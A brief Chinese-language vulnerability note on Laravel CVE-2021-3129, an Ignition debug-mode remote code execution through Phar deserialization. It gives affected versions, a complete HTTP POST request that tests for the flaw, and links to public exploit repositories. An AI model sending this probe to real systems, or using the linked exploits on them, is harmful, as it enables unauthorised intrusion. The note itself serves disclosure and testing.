Laravel RCE CVE-2021-3129

当Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar反序列化，最终造成远程代码执行。

Laravel <= 8.4.2

• 返回 500 证明存在漏洞

POST /_ignition/execute-solution HTTP/1.1Host: 192.168.24.153:8888Accept: application/jsonContent-Type: application/x-www-form-urlencodedContent-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=cve20213129&parameters[viewFile]=null

参考：

https://tyskill.github.io/posts/cve_2021_3129/

https://github.com/SNCKER/CVE-2021-3129

https://github.com/zhzyker/CVE-2021-3129

项目地址：

https://github.com/keyuan15/CVE-2021-3129